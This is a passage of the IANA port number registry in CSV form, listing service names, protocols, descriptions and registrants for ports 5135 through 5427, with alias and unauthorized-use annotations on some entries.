erp-scale,5135,tcp,ERP-Scale,[Ian_Bradley],[Ian_Bradley],2009-10-14,,,,,"Defined TXT keys: RFC= Device=" ,5135,udp,Reserved,,,,,,,, ,5136,tcp,Reserved,,,,,,,, minotaur-sa,5136,udp,Minotaur SA,[Kenneth_Flynn],[Kenneth_Flynn],2009-10-14,,,,, ctsd,5137,tcp,MyCTS server port,[Jilles_Oldenbeuving],[Jilles_Oldenbeuving],2002-06,,,,, ctsd,5137,udp,MyCTS server port,[Jilles_Oldenbeuving],[Jilles_Oldenbeuving],2002-06,,,,, ,5138-5144,,Unassigned,,,,,,,, rmonitor-secure,5145,tcp,"RMONITOR SECURE IANA assigned this well-formed service name as a replacement for ""rmonitor_secure"".",[Kory_Hamzeh],[Kory_Hamzeh],,,,,, rmonitor_secure,5145,tcp,RMONITOR SECURE,[Kory_Hamzeh],[Kory_Hamzeh],,,,,,"This entry is an alias to ""rmonitor-secure"". This entry is now historic, not usable for use with many common service discovery mechanisms." rmonitor-secure,5145,udp,"RMONITOR SECURE IANA assigned this well-formed service name as a replacement for ""rmonitor_secure"".",[Kory_Hamzeh],[Kory_Hamzeh],,,,,, rmonitor_secure,5145,udp,RMONITOR SECURE,[Kory_Hamzeh],[Kory_Hamzeh],,,,,,"This entry is an alias to ""rmonitor-secure"". This entry is now historic, not usable for use with many common service discovery mechanisms." social-alarm,5146,tcp,Social Alarm Service,[Shaun_Byrne],[Shaun_Byrne],2009-08-18,,,,, ,5146,udp,Reserved,,,,,,,, ,5147-5149,,Unassigned,,,,,,,, atmp,5150,tcp,Ascend Tunnel Management Protocol,[Kory_Hamzeh],[Kory_Hamzeh],,,,,, atmp,5150,udp,Ascend Tunnel Management Protocol,[Kory_Hamzeh],[Kory_Hamzeh],,,,,, esri-sde,5151,tcp,"ESRI SDE Instance IANA assigned this well-formed service name as a replacement for ""esri_sde"".",[Peter_Aronson],[Peter_Aronson],,,,,Unauthorized Use Known on ports 5151 and 5152, esri_sde,5151,tcp,ESRI SDE Instance,[Peter_Aronson],[Peter_Aronson],,,,,,"This entry is an alias to ""esri-sde"". This entry is now historic, not usable for use with many common service discovery mechanisms." esri-sde,5151,udp,"ESRI SDE Remote Start IANA assigned this well-formed service name as a replacement for ""esri_sde"".",[Peter_Aronson],[Peter_Aronson],,,,,Unauthorized Use Known on ports 5151 and 5152, esri_sde,5151,udp,ESRI SDE Remote Start,[Peter_Aronson],[Peter_Aronson],,,,,,"This entry is an alias to ""esri-sde"". This entry is now historic, not usable for use with many common service discovery mechanisms." sde-discovery,5152,tcp,ESRI SDE Instance Discovery,[Peter_Aronson],[Peter_Aronson],,,,,Unauthorized Use Known on ports 5151 and 5152, sde-discovery,5152,udp,ESRI SDE Instance Discovery,[Peter_Aronson],[Peter_Aronson],,,,,Unauthorized Use Known on ports 5151 and 5152, toruxserver,5153,tcp,ToruX Game Server,[Josse_van_Dobben_de],[Josse_van_Dobben_de],2009-07-01,,,,, ,5153,udp,Reserved,,,,,,,, bzflag,5154,tcp,BZFlag game server,[Tim_Riker],[Tim_Riker],2003-07,,,,, bzflag,5154,udp,BZFlag game server,[Tim_Riker],[Tim_Riker],2003-07,,,,, asctrl-agent,5155,tcp,Oracle asControl Agent,[Todd_Guay],[Todd_Guay],2005-08,,,,, asctrl-agent,5155,udp,Oracle asControl Agent,[Todd_Guay],[Todd_Guay],2005-08,,,,, rugameonline,5156,tcp,Russian Online Game,[Andrey_Mohov],[Andrey_Mohov],2010-08-17,,,,, ,5156,udp,Reserved,,,,,,,, mediat,5157,tcp,Mediat Remote Object Exchange,[Oliver_Anan],[Oliver_Anan],2010-09-02,,,,, ,5157,udp,Reserved,,,,,,,, ,5158-5160,,Unassigned,,,,,,,, snmpssh,5161,tcp,SNMP over SSH Transport Model,,,,,[RFC5592],,, ,5161,udp,Reserved,,,,,,,, snmpssh-trap,5162,tcp,SNMP Notification over SSH Transport Model,,,,,[RFC5592],,Known Unauthorized Use on port 5162, ,5162,udp,Reserved,,,,,,,Known Unauthorized Use on port 5162, sbackup,5163,tcp,Shadow Backup,[Glenn_Allen],[Glenn_Allen],2009-08-05,,,,, ,5163,udp,Reserved,,,,,,,, vpa,5164,tcp,Virtual Protocol Adapter,[Douglas_Goodall],[Douglas_Goodall],2009-08-05,,,,, vpa-disc,5164,udp,Virtual Protocol Adapter Discovery,[Douglas_Goodall],[Douglas_Goodall],2009-08-05,,,,, ife-icorp,5165,tcp,"ife_1corp IANA assigned this well-formed service name as a replacement for ""ife_icorp"".",[Paul_Annala],[Paul_Annala],,,,,, ife_icorp,5165,tcp,ife_1corp,[Paul_Annala],[Paul_Annala],,,,,,"This entry is an alias to ""ife-icorp"". This entry is now historic, not usable for use with many common service discovery mechanisms." ife-icorp,5165,udp,"ife_1corp IANA assigned this well-formed service name as a replacement for ""ife_icorp"".",[Paul_Annala],[Paul_Annala],,,,,, ife_icorp,5165,udp,ife_1corp,[Paul_Annala],[Paul_Annala],,,,,,"This entry is an alias to ""ife-icorp"". This entry is now historic, not usable for use with many common service discovery mechanisms." winpcs,5166,tcp,WinPCS Service Connection,[Complan_Network_AS],[Complan_Network_AS],2006-02,,,,, winpcs,5166,udp,WinPCS Service Connection,[Complan_Network_AS],[Complan_Network_AS],2006-02,,,,, scte104,5167,tcp,SCTE104 Connection,[Thomas_Russell],[Thomas_Russell],2005-05,,,,, scte104,5167,udp,SCTE104 Connection,[Thomas_Russell],[Thomas_Russell],2005-05,,,,, scte30,5168,tcp,SCTE30 Connection,[Thomas_Russell],[Thomas_Russell],2005-05,,,,, scte30,5168,udp,SCTE30 Connection,[Thomas_Russell],[Thomas_Russell],2005-05,,,,, ,5169-5171,,Unassigned,,,,,,,, pcoip-mgmt,5172,tcp,PC over IP Endpoint Management,[Teradici_2],[Paul_Helter],2014-04-28,,,,, ,5172,udp,Reserved,,,,,,,, ,5173-5189,,Unassigned,,,,,,,, aol,5190,tcp,America-Online,[Marty_Lyons],[Marty_Lyons],,,,,, aol,5190,udp,America-Online,[Marty_Lyons],[Marty_Lyons],,,,,, aol-1,5191,tcp,AmericaOnline1,[Bruce_Mackey],[Bruce_Mackey],,,,,, aol-1,5191,udp,AmericaOnline1,[Bruce_Mackey],[Bruce_Mackey],,,,,, aol-2,5192,tcp,AmericaOnline2,[Bruce_Mackey],[Bruce_Mackey],,,,,, aol-2,5192,udp,AmericaOnline2,[Bruce_Mackey],[Bruce_Mackey],,,,,, aol-3,5193,tcp,AmericaOnline3,[Bruce_Mackey],[Bruce_Mackey],,,,,, aol-3,5193,udp,AmericaOnline3,[Bruce_Mackey],[Bruce_Mackey],,,,,, cpscomm,5194,tcp,CipherPoint Config Service,[CipherPoint],[CipherPoint],2010-03-03,,,,, ,5194,udp,Reserved,,,,,,,, ampl-lic,5195,tcp,The protocol is used by a license server and client programs to control use of program licenses that float to networked machines,[AMPL_Optimization],[David_M_Gay],2012-05-25,,,,, ,5195,udp,Reserved,,,,,,,, ampl-tableproxy,5196,tcp,"The protocol is used by two programs that exchange ""table"" data used in the AMPL modeling language",[AMPL_Optimization],[David_M_Gay],2012-05-25,,,,, ,5196,udp,Reserved,,,,,,,, ,5197-5199,,Unassigned,,,,,,,, targus-getdata,5200,tcp,TARGUS GetData,[John_Keaveney],[John_Keaveney],,,,,, targus-getdata,5200,udp,TARGUS GetData,[John_Keaveney],[John_Keaveney],,,,,, targus-getdata1,5201,tcp,TARGUS GetData 1,[John_Keaveney],[John_Keaveney],,,,,, targus-getdata1,5201,udp,TARGUS GetData 1,[John_Keaveney],[John_Keaveney],,,,,, targus-getdata2,5202,tcp,TARGUS GetData 2,[John_Keaveney],[John_Keaveney],,,,,, targus-getdata2,5202,udp,TARGUS GetData 2,[John_Keaveney],[John_Keaveney],,,,,, targus-getdata3,5203,tcp,TARGUS GetData 3,[John_Keaveney],[John_Keaveney],,,,,, targus-getdata3,5203,udp,TARGUS GetData 3,[John_Keaveney],[John_Keaveney],,,,,, ,5204-5208,,Unassigned,,,,,,,, nomad,5209,tcp,Nomad Device Video Transfer,[Morega_System],[Ashraf_Tahir],2012-08-20,,,,, ,5209,udp,Reserved,,,,,,,, ,5210-5214,,Unassigned,,,,,,,, noteza,5215,tcp,NOTEZA Data Safety Service,[CNS_a.s.],[Pavel_Mendl_2],2014-06-12,,,,, ,5215,udp,Reserved,,,,,,,, noteza,5215,sctp,NOTEZA Data Safety Service,[CNS_a.s.],[Pavel_Mendl_2],2014-06-12,,,,, ,5216-5220,,Unassigned,,,,,,,, 3exmp,5221,tcp,3eTI Extensible Management Protocol for OAMP,[Bill_Rettig],[Bill_Rettig],2010-05-19,,,,, ,5221,udp,Reserved,,,,,,,, xmpp-client,5222,tcp,XMPP Client Connection,,,,,[RFC6120],,, ,5222,udp,Reserved,,,,,,,, hpvirtgrp,5223,tcp,HP Virtual Machine Group Management,[John_Williams],[John_Williams],2007-06,,,,, hpvirtgrp,5223,udp,HP Virtual Machine Group Management,[John_Williams],[John_Williams],2007-06,,,,, hpvirtctrl,5224,tcp,HP Virtual Machine Console Operations,[John_Williams],[John_Williams],2007-06,,,,, hpvirtctrl,5224,udp,HP Virtual Machine Console Operations,[John_Williams],[John_Williams],2007-06,,,,, hp-server,5225,tcp,HP Server,[Brett_Green_2],[Brett_Green_2],,,,,, hp-server,5225,udp,HP Server,[Brett_Green_2],[Brett_Green_2],,,,,, hp-status,5226,tcp,HP Status,[Brett_Green_2],[Brett_Green_2],,,,,, hp-status,5226,udp,HP Status,[Brett_Green_2],[Brett_Green_2],,,,,, perfd,5227,tcp,HP System Performance Metric Service,[Chris_Bertin],[Chris_Bertin],2009-05-19,,,,, perfd,5227,udp,HP System Performance Metric Service,[Chris_Bertin],[Chris_Bertin],2009-05-19,,,,, hpvroom,5228,tcp,HP Virtual Room Service,[Scott_Levin],[Scott_Levin],2009-03-19,,,,, ,5228,udp,Reserved,,,,,,,, ,5229-5231,,Unassigned,,,,,,,, csedaemon,5232,tcp,Cruse Scanning System Service,[Christof_J_Reetz],[Christof_J_Reetz],2011-03-09,,,,, ,5232,udp,Reserved,,,,,,,, enfs,5233,tcp,Etinnae Network File Service,[Chris_Peel],[Chris_Peel],2011-03-09,,,,, ,5233,udp,Reserved,,,,,,,, eenet,5234,tcp,EEnet communications,[Helmut_Giritzer],[Helmut_Giritzer],2005-11,,,,, eenet,5234,udp,EEnet communications,[Helmut_Giritzer],[Helmut_Giritzer],2005-11,,,,, galaxy-network,5235,tcp,Galaxy Network Service,[Michael_Andre_2],[Michael_Andre_2],2007-10-04,,,,, galaxy-network,5235,udp,Galaxy Network Service,[Michael_Andre_2],[Michael_Andre_2],2007-10-04,,,,, padl2sim,5236,tcp,,,,,,,,, padl2sim,5236,udp,,,,,,,,, mnet-discovery,5237,tcp,m-net discovery,[Andy_Crick],[Andy_Crick],2007-11-13,,,,, mnet-discovery,5237,udp,m-net discovery,[Andy_Crick],[Andy_Crick],2007-11-13,,,,, ,5238-5244,,Unassigned,,,,,,,, downtools,5245,tcp,DownTools Control Protocol,[Jarrod_Sayers],[Jarrod_Sayers],2009-04-07,,,,, downtools-disc,5245,udp,DownTools Discovery Protocol,[Jarrod_Sayers],[Jarrod_Sayers],2009-04-07,,,,, ,5246,tcp,Reserved,,,,,,,, capwap-control,5246,udp,CAPWAP Control Protocol,,,,,[RFC5415],,, ,5247,tcp,Reserved,,,,,,,, capwap-data,5247,udp,CAPWAP Data Protocol,,,,,[RFC5415],,, caacws,5248,tcp,CA Access Control Web Service,[Gabriel_Kalmar],[Gabriel_Kalmar],2008-03-06,,,,, caacws,5248,udp,CA Access Control Web Service,[Gabriel_Kalmar],[Gabriel_Kalmar],2008-03-06,,,,, caaclang2,5249,tcp,CA AC Lang Service,[Gabriel_Kalmar],[Gabriel_Kalmar],2008-02-19,,,,, caaclang2,5249,udp,CA AC Lang Service,[Gabriel_Kalmar],[Gabriel_Kalmar],2008-02-19,,,,, soagateway,5250,tcp,soaGateway,[Greg_Bodine],[Greg_Bodine],2002-02,,,,, soagateway,5250,udp,soaGateway,[Greg_Bodine],[Greg_Bodine],2002-02,,,,, caevms,5251,tcp,CA eTrust VM Service,[Kevin_Bond],[Kevin_Bond],2004-11,,,,, caevms,5251,udp,CA eTrust VM Service,[Kevin_Bond],[Kevin_Bond],2004-11,,,,, movaz-ssc,5252,tcp,Movaz SSC,[Lou_Berger],[Lou_Berger],2004-11,,,,, movaz-ssc,5252,udp,Movaz SSC,[Lou_Berger],[Lou_Berger],2004-11,,,,, kpdp,5253,tcp,Kohler Power Device Protocol,[Bill_Gross],[Bill_Gross],2010-11-01,,,,, ,5253,udp,Reserved,,,,,,,, ,5254-5263,,Unassigned,,,,,,,, 3com-njack-1,5264,tcp,3Com Network Jack Port 1,[Abhay_Rajaram],[Abhay_Rajaram],2003-03,,,,, 3com-njack-1,5264,udp,3Com Network Jack Port 1,[Abhay_Rajaram],[Abhay_Rajaram],2003-03,,,,, 3com-njack-2,5265,tcp,3Com Network Jack Port 2,[Abhay_Rajaram],[Abhay_Rajaram],2003-03,,,,, 3com-njack-2,5265,udp,3Com Network Jack Port 2,[Abhay_Rajaram],[Abhay_Rajaram],2003-03,,,,, ,5266-5268,,Unassigned,,,,,,,, xmpp-server,5269,tcp,XMPP Server Connection,,,,,[RFC6120],,, ,5269,udp,Reserved,,,,,,,, cartographerxmp,5270,tcp,Cartographer XMP,[Bobby_Krupczak_2],[Bobby_Krupczak_2],2008-04-03,2011-08-31,,,, cartographerxmp,5270,udp,Cartographer XMP,[Bobby_Krupczak_2],[Bobby_Krupczak_2],2008-04-03,2011-08-31,,,, cuelink,5271,tcp,StageSoft CueLink messaging,[Todd_Pichler],[Todd_Pichler],2010-03-26,,,,, cuelink-disc,5271,udp,StageSoft CueLink discovery,[Todd_Pichler],[Todd_Pichler],2010-03-26,,,,, pk,5272,tcp,PK,[Patrick_Kara],[Patrick_Kara],,,,,, pk,5272,udp,PK,[Patrick_Kara],[Patrick_Kara],,,,,, ,5273-5279,,Unassigned,,,,,,,, xmpp-bosh,5280,tcp,Bidirectional-streams Over Synchronous HTTP (BOSH),[Peter_Saint_Andre],[Peter_Saint_Andre],2009-11-25,,,,, ,5280,udp,Reserved,,,,,,,, undo-lm,5281,tcp,Undo License Manager,[Julian_Smith],[Julian_Smith],2010-04-19,,,,, ,5281,udp,Reserved,,,,,,,, transmit-port,5282,tcp,Marimba Transmitter Port,[Johan_Eriksson],[Johan_Eriksson],2002-04,,,,, transmit-port,5282,udp,Marimba Transmitter Port,[Johan_Eriksson],[Johan_Eriksson],2002-04,,,,, ,5283-5297,,Unassigned,,,,,,,, presence,5298,tcp,XMPP Link-Local Messaging,[Eric_St_Onge],[Eric_St_Onge],2008-01-14,,,,,Defined TXT keys: See http://www.xmpp.org/registrar/linklocal.html presence,5298,udp,XMPP Link-Local Messaging,[Eric_St_Onge],[Eric_St_Onge],2008-01-14,,,,,Defined TXT keys: See http://www.xmpp.org/registrar/linklocal.html nlg-data,5299,tcp,NLG Data Service,[Andy_Shellam],[Andy_Shellam],2008-02-19,,,,, nlg-data,5299,udp,NLG Data Service,[Andy_Shellam],[Andy_Shellam],2008-02-19,,,,, hacl-hb,5300,tcp,HA cluster heartbeat,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, hacl-hb,5300,udp,HA cluster heartbeat,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, hacl-gs,5301,tcp,HA cluster general services,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, hacl-gs,5301,udp,HA cluster general services,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, hacl-cfg,5302,tcp,HA cluster configuration,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, hacl-cfg,5302,udp,HA cluster configuration,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, hacl-probe,5303,tcp,HA cluster probing,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, hacl-probe,5303,udp,HA cluster probing,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, hacl-local,5304,tcp,HA Cluster Commands,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, hacl-local,5304,udp,HA Cluster Commands,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, hacl-test,5305,tcp,HA Cluster Test,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, hacl-test,5305,udp,HA Cluster Test,[Eric_Soderberg_2][Edward_Yim],[Eric_Soderberg_2][Edward_Yim],,,,,, sun-mc-grp,5306,tcp,Sun MC Group,[Michael_DeMoney],[Michael_DeMoney],,,,,, sun-mc-grp,5306,udp,Sun MC Group,[Michael_DeMoney],[Michael_DeMoney],,,,,, sco-aip,5307,tcp,SCO AIP,[Barrie_Cooper],[Barrie_Cooper],,,,,, sco-aip,5307,udp,SCO AIP,[Barrie_Cooper],[Barrie_Cooper],,,,,, cfengine,5308,tcp,CFengine,[Mark_Burgess],[Mark_Burgess],,,,,, cfengine,5308,udp,CFengine,[Mark_Burgess],[Mark_Burgess],,,,,, jprinter,5309,tcp,J Printer,[Ken_Blackwell],[Ken_Blackwell],,,,,, jprinter,5309,udp,J Printer,[Ken_Blackwell],[Ken_Blackwell],,,,,, outlaws,5310,tcp,Outlaws,[Richard_Fife],[Richard_Fife],,,,,, outlaws,5310,udp,Outlaws,[Richard_Fife],[Richard_Fife],,,,,, ,5311,,Unassigned,,,2004-05-07,,,,, permabit-cs,5312,tcp,Permabit Client-Server,[Jered_Floyd],[Jered_Floyd],2004-06,,,,, permabit-cs,5312,udp,Permabit Client-Server,[Jered_Floyd],[Jered_Floyd],2004-06,,,,, rrdp,5313,tcp,Real-time & Reliable Data,[Ted_Hoshi],[Ted_Hoshi],2004-06,,,,, rrdp,5313,udp,Real-time & Reliable Data,[Ted_Hoshi],[Ted_Hoshi],2004-06,,,,, opalis-rbt-ipc,5314,tcp,opalis-rbt-ipc,[Laurent_Domenech],[Laurent_Domenech],,,,,, opalis-rbt-ipc,5314,udp,opalis-rbt-ipc,[Laurent_Domenech],[Laurent_Domenech],,,,,, hacl-poll,5315,tcp,HA Cluster UDP Polling,[Hoa_Nguyen],[Hoa_Nguyen],,,,,, hacl-poll,5315,udp,HA Cluster UDP Polling,[Hoa_Nguyen],[Hoa_Nguyen],,,,,, hpbladems,5316,tcp,HPBladeSystem Monitor Service,[Alan_Minchew],[Alan_Minchew],2011-05-23,2011-05-16,,,, ,5316,udp,Unassigned,,,2011-05-16,,,,, hpdevms,5317,tcp,HP Device Monitor Service,[Alan_Minchew],[Alan_Minchew],2011-05-16,,,,, ,5317,udp,Reserved,,,,,,,, pkix-cmc,5318,tcp,PKIX Certificate Management using CMS (CMC),[IESG],[IETF_Chair],,,[RFC6402],,, ,5318,udp,Reserved,,,,,,,, ,5319,,Unassigned,,,,,,,, bsfserver-zn,5320,tcp,Webservices-based Zn interface of BSF,[Bert_Paul],[Bert_Paul],2008-05-01,,,,, ,5320,udp,Reserved,,,,,,,, bsfsvr-zn-ssl,5321,tcp,Webservices-based Zn interface of BSF over SSL,[Bert_Paul],[Bert_Paul],2008-07-03,,,,, ,5321,udp,Reserved,,,,,,,, ,5322-5342,,Unassigned,,,,,,,, kfserver,5343,tcp,Sculptor Database Server,[Keith_Ashman],[Keith_Ashman],2005-12,,,,, kfserver,5343,udp,Sculptor Database Server,[Keith_Ashman],[Keith_Ashman],2005-12,,,,, xkotodrcp,5344,tcp,xkoto DRCP,[Jeff_Heisz],[Jeff_Heisz],2006-02,,,,, xkotodrcp,5344,udp,xkoto DRCP,[Jeff_Heisz],[Jeff_Heisz],2006-02,,,,, ,5345-5348,,Unassigned,,,,,,,, stuns,5349,tcp,STUN over TLS,,,,,[RFC5389],,, stuns,5349,udp,STUN over DTLS,[IESG],[IETF_Chair],,2014-07-03,[RFC-ietf-tram-stun-dtls-05],,,This service name was initially created by [RFC5389]. turns,5349,tcp,TURN over TLS,,,,,[RFC5766],,, turns,5349,udp,TURN over DTLS,[IESG],[IETF_Chair],,2014-07-03,[RFC-ietf-tram-stun-dtls-05],,,This service name was initially created by [RFC5766]. stun-behaviors,5349,tcp,STUN Behavior Discovery over TLS,,,,,[RFC5780],,, stun-behaviors,5349,udp,Reserved for a future enhancement of STUN-BEHAVIOR,,,,,[RFC5780],,, ,5350,tcp,Reserved,,,,,,,, pcp-multicast,5350,udp,Port Control Protocol Multicast,[IESG],[IETF_Chair],,,[RFC6887],,, ,5351,tcp,Reserved,,,,,,,, pcp,5351,udp,Port Control Protocol,[IESG],[IETF_Chair],,,[RFC6887],,, dns-llq,5352,tcp,DNS Long-Lived Queries,[Kiren_Sekar],[Kiren_Sekar],2005-08,,,,, dns-llq,5352,udp,DNS Long-Lived Queries,[Kiren_Sekar],[Kiren_Sekar],2005-08,,,,, mdns,5353,tcp,Multicast DNS,[IESG],[IETF_Chair],,,[RFC6762],,, mdns,5353,udp,Multicast DNS,[IESG],[IETF_Chair],,,[RFC6762],,, mdnsresponder,5354,tcp,Multicast DNS Responder IPC,[Stuart_Cheshire_3],[Stuart_Cheshire_3],2004-06,,,,, mdnsresponder,5354,udp,Multicast DNS Responder IPC,[Stuart_Cheshire_3],[Stuart_Cheshire_3],2004-06,,,,, llmnr,5355,tcp,LLMNR,[Bernard_Aboba],[Bernard_Aboba],2004-06,,,,, llmnr,5355,udp,LLMNR,[Bernard_Aboba],[Bernard_Aboba],2004-06,,,,, ms-smlbiz,5356,tcp,Microsoft Small Business,[Gopikrishna_Sandra],[Gopikrishna_Sandra],2005-02,,,,, ms-smlbiz,5356,udp,Microsoft Small Business,[Gopikrishna_Sandra],[Gopikrishna_Sandra],2005-02,,,,, wsdapi,5357,tcp,Web Services for Devices,[Henry_Rawas],[Henry_Rawas],2005-08,,,,, wsdapi,5357,udp,Web Services for Devices,[Henry_Rawas],[Henry_Rawas],2005-08,,,,, wsdapi-s,5358,tcp,WS for Devices Secured,[Henry_Rawas],[Henry_Rawas],2005-08,,,,, wsdapi-s,5358,udp,WS for Devices Secured,[Henry_Rawas],[Henry_Rawas],2005-08,,,,, ms-alerter,5359,tcp,Microsoft Alerter,[Marc_McClure],[Marc_McClure],2007-08-07,,,,, ms-alerter,5359,udp,Microsoft Alerter,[Marc_McClure],[Marc_McClure],2007-08-07,,,,, ms-sideshow,5360,tcp,Protocol for Windows SideShow,[Dan_Polivy],[Dan_Polivy],2008-03-12,,,,, ms-sideshow,5360,udp,Protocol for Windows SideShow,[Dan_Polivy],[Dan_Polivy],2008-03-12,,,,, ms-s-sideshow,5361,tcp,Secure Protocol for Windows SideShow,[Dan_Polivy],[Dan_Polivy],2008-03-12,,,,, ms-s-sideshow,5361,udp,Secure Protocol for Windows SideShow,[Dan_Polivy],[Dan_Polivy],2008-03-12,,,,, serverwsd2,5362,tcp,Microsoft Windows Server WSD2 Service,[Erhan_Soyer_Osman],[Erhan_Soyer_Osman],2008-03-26,,,,, serverwsd2,5362,udp,Microsoft Windows Server WSD2 Service,[Erhan_Soyer_Osman],[Erhan_Soyer_Osman],2008-03-26,,,,, net-projection,5363,tcp,Windows Network Projection,[Rob_Williams],[Rob_Williams],2009-02-17,,,,, net-projection,5363,udp,Windows Network Projection,[Rob_Williams],[Rob_Williams],2009-02-17,,,,, kdnet,5364,udp,Microsoft Kernel Debugger,[Microsoft_Corporation_4],[Joe_Ballantyne],2013-06-16,,,,, ,5364,tcp,Reserved,,,,,,,, ,5365-5396,,Unassigned,,,,,,,, stresstester,5397,tcp,StressTester(tm) Injector,[Graham_Parsons],[Graham_Parsons],2005-08,,,,, stresstester,5397,udp,StressTester(tm) Injector,[Graham_Parsons],[Graham_Parsons],2005-08,,,,, elektron-admin,5398,tcp,Elektron Administration,[Chris_Hawk],[Chris_Hawk],2005-08,,,,, elektron-admin,5398,udp,Elektron Administration,[Chris_Hawk],[Chris_Hawk],2005-08,,,,, securitychase,5399,tcp,SecurityChase,[Daisuke_Shinomiya],[Daisuke_Shinomiya],2005-08,,,,, securitychase,5399,udp,SecurityChase,[Daisuke_Shinomiya],[Daisuke_Shinomiya],2005-08,,,,, excerpt,5400,tcp,Excerpt Search,[John_Hinsdale],[John_Hinsdale],,,,,, excerpt,5400,udp,Excerpt Search,[John_Hinsdale],[John_Hinsdale],,,,,, excerpts,5401,tcp,Excerpt Search Secure,[John_Hinsdale],[John_Hinsdale],,,,,, excerpts,5401,udp,Excerpt Search Secure,[John_Hinsdale],[John_Hinsdale],,,,,, mftp,5402,tcp,OmniCast MFTP,[Steve_Bannister],[Steve_Bannister],,,,,, mftp,5402,udp,OmniCast MFTP,[Steve_Bannister],[Steve_Bannister],,,,,, hpoms-ci-lstn,5403,tcp,HPOMS-CI-LSTN,[Harold_Froehling],[Harold_Froehling],,,,,, hpoms-ci-lstn,5403,udp,HPOMS-CI-LSTN,[Harold_Froehling],[Harold_Froehling],,,,,, hpoms-dps-lstn,5404,tcp,HPOMS-DPS-LSTN,[Harold_Froehling],[Harold_Froehling],,,,,, hpoms-dps-lstn,5404,udp,HPOMS-DPS-LSTN,[Harold_Froehling],[Harold_Froehling],,,,,, netsupport,5405,tcp,NetSupport,[Paul_Sanders_2],[Paul_Sanders_2],,,,,, netsupport,5405,udp,NetSupport,[Paul_Sanders_2],[Paul_Sanders_2],,,,,, systemics-sox,5406,tcp,Systemics Sox,[Gary_Howland],[Gary_Howland],,,,,, systemics-sox,5406,udp,Systemics Sox,[Gary_Howland],[Gary_Howland],,,,,, foresyte-clear,5407,tcp,Foresyte-Clear,[Jorge_Aldana],[Jorge_Aldana],,,,,, foresyte-clear,5407,udp,Foresyte-Clear,[Jorge_Aldana],[Jorge_Aldana],,,,,, foresyte-sec,5408,tcp,Foresyte-Sec,[Jorge_Aldana],[Jorge_Aldana],,,,,, foresyte-sec,5408,udp,Foresyte-Sec,[Jorge_Aldana],[Jorge_Aldana],,,,,, salient-dtasrv,5409,tcp,Salient Data Server,[Richard_Farnham],[Richard_Farnham],,,,,, salient-dtasrv,5409,udp,Salient Data Server,[Richard_Farnham],[Richard_Farnham],,,,,, salient-usrmgr,5410,tcp,Salient User Manager,[Richard_Farnham],[Richard_Farnham],,,,,, salient-usrmgr,5410,udp,Salient User Manager,[Richard_Farnham],[Richard_Farnham],,,,,, actnet,5411,tcp,ActNet,[Simon_Robillard],[Simon_Robillard],,,,,, actnet,5411,udp,ActNet,[Simon_Robillard],[Simon_Robillard],,,,,, continuus,5412,tcp,Continuus,[Steven_Holtsberg],[Steven_Holtsberg],,,,,, continuus,5412,udp,Continuus,[Steven_Holtsberg],[Steven_Holtsberg],,,,,, wwiotalk,5413,tcp,WWIOTALK,[Roger_Knobbe],[Roger_Knobbe],,,,,, wwiotalk,5413,udp,WWIOTALK,[Roger_Knobbe],[Roger_Knobbe],,,,,, statusd,5414,tcp,StatusD,[Stephen_Misel_2],[Stephen_Misel_2],,,,,, statusd,5414,udp,StatusD,[Stephen_Misel_2],[Stephen_Misel_2],,,,,, ns-server,5415,tcp,NS Server,[Jeffrey_Chiao],[Jeffrey_Chiao],,,,,, ns-server,5415,udp,NS Server,[Jeffrey_Chiao],[Jeffrey_Chiao],,,,,, sns-gateway,5416,tcp,SNS Gateway,[Mary_Holstage],[Mary_Holstage],,,,,, sns-gateway,5416,udp,SNS Gateway,[Mary_Holstage],[Mary_Holstage],,,,,, sns-agent,5417,tcp,SNS Agent,[Mary_Holstage],[Mary_Holstage],,,,,, sns-agent,5417,udp,SNS Agent,[Mary_Holstage],[Mary_Holstage],,,,,, mcntp,5418,tcp,MCNTP,[Heiko_Rupp],[Heiko_Rupp],,,,,, mcntp,5418,udp,MCNTP,[Heiko_Rupp],[Heiko_Rupp],,,,,, dj-ice,5419,tcp,DJ-ICE,[Don_Tyson_2],[Don_Tyson_2],,,,,, dj-ice,5419,udp,DJ-ICE,[Don_Tyson_2],[Don_Tyson_2],,,,,, cylink-c,5420,tcp,Cylink-C,[John_Jobe],[John_Jobe],,,,,, cylink-c,5420,udp,Cylink-C,[John_Jobe],[John_Jobe],,,,,, netsupport2,5421,tcp,Net Support 2,[Paul_Sanders],[Paul_Sanders],,,,,, netsupport2,5421,udp,Net Support 2,[Paul_Sanders],[Paul_Sanders],,,,,, salient-mux,5422,tcp,Salient MUX,[Richard_Farnham],[Richard_Farnham],,,,,, salient-mux,5422,udp,Salient MUX,[Richard_Farnham],[Richard_Farnham],,,,,, virtualuser,5423,tcp,VIRTUALUSER,[Chad_Williams],[Chad_Williams],,,,,, virtualuser,5423,udp,VIRTUALUSER,[Chad_Williams],[Chad_Williams],,,,,, beyond-remote,5424,tcp,Beyond Remote,[Michael_Berg],[Michael_Berg],2004-11,,,,, beyond-remote,5424,udp,Beyond Remote,[Michael_Berg],[Michael_Berg],2004-11,,,,, br-channel,5425,tcp,Beyond Remote Command Channel,[Michael_Berg],[Michael_Berg],2005-08,,,,, br-channel,5425,udp,Beyond Remote Command Channel,[Michael_Berg],[Michael_Berg],2005-08,,,,, devbasic,5426,tcp,DEVBASIC,[Curtis_Smith],[Curtis_Smith],,,,,, devbasic,5426,udp,DEVBASIC,[Curtis_Smith],[Curtis_Smith],,,,,, sco-peer-tta,5427,tcp,SCO-PEER-TTA,[Andrew_Shire],[Andrew_Shire],,,,,, sco-peer-tta,5427,udp,SCO-PEER-TTA,[Andrew_Shire],[Andrew_Shire],,,,,, 